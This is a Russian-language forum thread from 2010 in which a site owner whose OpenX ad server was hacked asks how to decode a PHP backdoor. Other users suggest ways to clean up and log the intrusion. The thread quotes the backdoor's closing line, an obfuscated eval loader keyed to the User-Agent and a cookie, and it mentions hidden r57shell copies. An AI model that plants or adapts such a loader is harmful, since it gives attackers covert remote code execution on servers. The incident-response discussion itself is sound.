Восстановление зашифрованного(сжатого) кода

[f0xman]

Восстановление зашифрованного(сжатого) кода

Происхождение кода.
Данный файл я нашел в одной из директорий своего сайта, софта OpenX (версия 2.6) , который взломали через найденную уязвимость.
Собственно раскриптовав его, хочу найти дыру откуда поимели, так как у разработчика на сайте только упоминание о уязвимости без деталей.
--------------------------------------

Друзья. Помогите плз расшифровать код.

Заканчивается он как :

$ІSѓ_xBa›њ51Д=str_repeat(md5($_SERVER["HTTP_USER_AGENT"].$_COOKIE["z_salt"]),72);@eval(@gzuncompress(($ІSѓ_іBa›њ51Д^$ІSѓ_xBa›њ51Д)));/*simp100219*/

Соответственно $ІSѓ_іBa›њ51Д – переменая которая расжимается и исполняется.

Поделитесь мыслью, как восстановить код который содержит переменная.
Премного благодарен

 

[Вурдалак]

f0xman
Нихрена. Эта переменная, похоже, содержит ключ для XOR-шифрования.

Ну а код восстановить просто: нужно заменить eval на echo

-~{}~ 26.03.10 22:00:

Ой, всё верно. Названия у них похожие.

 

[f0xman]

Автор оригинала: Вурдалак
f0xman
Нихрена. Эта переменная, похоже, содержит ключ для XOR-шифрования.

Ну а код восстановить просто: нужно заменить eval на echo

Это первое что я попробовал и получил gzuncompress() : data error in ..

 

[Вурдалак]

f0xman
Ну значит не тот ключ или данные похерились.

 

[f0xman]

Данные не похерились точно, файл работает когда на него приходит запрос POST

Кстати а как Вы узнали что XOR-шифрование здесь?

 

[Вурдалак]

По символу "^".

 

[HraKK]

Тема закрыта

Варез, взлом, кража контента и другие противоправные действия запрещены к обсуждению на форуме.
Правила форума: http://phpclub.ru/talk/announcement.php?s=&forumid=12

-~{}~ 26.03.10 22:21:

В следующий раз, пишите, подробнее происхождение кракозяблей.

 

[f0xman]

HraKK

Спасибо учту

 

[HraKK]

Скажу проще все равно вы ничего не расшифруете потому что код на исполнение присылается в куках и в USER_AGENT

 

[dimagolov]

Скажу проще все равно вы ничего не расшифруете потому что код на исполнение присылается в куках и в USER_AGENT

а лог веб-сервера на что?

п.с. это что, вирусня такая?

 

[f0xman]

(( вот это совсем не круто.

А не подскажите есть ли вообще вариант узнать что приходит на этот скрипт, откладывается ли это в логах сервера?

-~{}~ 26.03.10 23:27:

Автор оригинала: dimagolov
а лог веб-сервера на что?

п.с. это что, вирусня такая?

В логах апача я нашел только обрщение к этому файлу через POST

 

[HraKK]

да обычный троян, удалите все и ладно.

 

[akd]

для диагностики можно перенаправить запрос на какой-то свой файлик через .htaccess, там все нужное записать в текстовый файлик и потом уже проанализировать.

 

[f0xman]

удалял!!
Появляется снова, в том то и проблема вся

 

[dimagolov]

В логах апача я нашел только обрщение к этому файлу через POST

по крайней мере USER_AGENT точно логируется апачем, посмотри конфиг и ман. С куками сложнее, может и не получиться без извратов их залогировать, надо смотреть ман.

Расскажи подробно, откуда взялся код.

 

[HraKK]

f0xman
смени пароли на фтп, блин, почисти компы СВОИ от троянов. и не юзай ИЕ

 

[f0xman]

Автор оригинала: dimagolov
по крайней мере USER_AGENT точно логируется апачем, посмотри конфиг и ман. С куками сложнее, может и не получиться без извратов их залогировать, надо смотреть ман.

Расскажи подробно, откуда взялся код.

файл я нашел в одной из директорий своего сайта, софта OpenX (версия 2.6) , который взломали через найденную уязвимость.

Нашел в логах вызов к этому файлу, поганец вызывая этот файл делает запись в одну из таблиц, вставляя frame в одну из хорошо посещаемых страниц сайта
Через этот ифрэйм идет редирект на сайт белого дома )))) вот такая политика млин.

Удалил этот файл, все обращений нет к нему ,НО сегодня утром опять обнаруживаю вставку iframe в этой же странице, афайла уже нет на серваке...... фига знает что делать
Отследить пол логам нереально, за сутки более 200 000 просмотров страниц

-~{}~ 26.03.10 23:35:

Автор оригинала: HraKK
f0xman
смени пароли на фтп, блин, почисти компы СВОИ от троянов. и не юзай ИЕ

Уже исключил, черех фтп не могли поиметь по логам только с моего ip заходы на серва.
Сервер выделенный соседей нет

пароль на все менял уже.

Грешу на OPenx, так как в его директорих это было

 

[HraKK]

f0xman
Что за сайт такой что 200.000 просмотров хХ

 

[dimagolov]

удалял!!
Появляется снова, в том то и проблема вся

совсем недавно сталкивался с такой проблемой. так как это был не хостинг, а собственный сервер, то подозрений на "соседей" не было. после того, как опустил ftp (а в файлы продолжал дописываться код) стало очевидно, что это не просто слитые вирусней пароли к ftp и стал искать shell. В итоге стал перебирать файлики, сделал grep "evel(" ./, смотрел что нашлось, нашел в итоге пару копий зашифрованного r57shell и еще один, не зашированный. потом уже просто, сканиться лог и выделяется с каких IP ходили на эти дырки, чтобы понять что еще может быть подозрительным.

-~{}~ 26.03.10 16:42:

и что характерно, этот OpenX у нас тоже стоял

-~{}~ 26.03.10 16:51:

HraKK, обычный сайт, вон у меня 1,388,829 строк в access.log за 22ч. 45 минут

f0xman, учи как пользоваться grep, find, sed и т.п. и сразу логи на 200т строк в сутки перестанут тебя пурать.

 

[f0xman]

Автор оригинала: dimagolov
совсем недавно сталкивался с такой проблемой. так как это был не хостинг, а собственный сервер, то подозрений на "соседей" не было. после того, как опустил ftp (а в файлы продолжал дописываться код) стало очевидно, что это не просто слитые вирусней пароли к ftp и стал искать shell. В итоге стал перебирать файлики, сделал grep "evel(" ./, смотрел что нашлось, нашел в итоге пару копий зашифрованного r57shell и еще один, не зашированный. потом уже просто, сканиться лог и выделяется с каких IP ходили на эти дырки, чтобы понять что еще может быть подозрительным.

-~{}~ 26.03.10 16:42:

и что характерно, этот OpenX у нас тоже стоял

та же история grep "eval" делал и нашел этот файл, но помимо него нашел еще 2 файла к которому обращение с того же ip но в нем уже нет eval , все зактиптовано
на форуме разработчиков нет ничего дельного кроме как обновите до последней версии, но самое поганое что я поставил самую последнюю 2.8.5 и все равно та же история((( кстати на форуме openx тоже есть пара сообщений что и последняя версия уязвима.

Полагаю что удаленное исполнение кода через како-то из файлов. И все усугубляется тем что поганец который это делает не просто скрипткиддер который заливает втупую чистый пхпшелл

-~{}~ 26.03.10 23:54:

f0xman, учи как пользоваться grep, find, sed и т.п. и сразу логи на 200т строк в сутки перестанут тебя пурать. [/QUOTE]
Да знаю )) и пользую, но если приходит по посту и файлы содержат такие кракозябры то что делать?)))
Кароче отчаяние овладело мной

-~{}~ 26.03.10 23:57:

Варианты коорые мне предложили
1. поставить mod_security
2. логировать все запросы к мускулю update

но это все костыли, причина ведь остается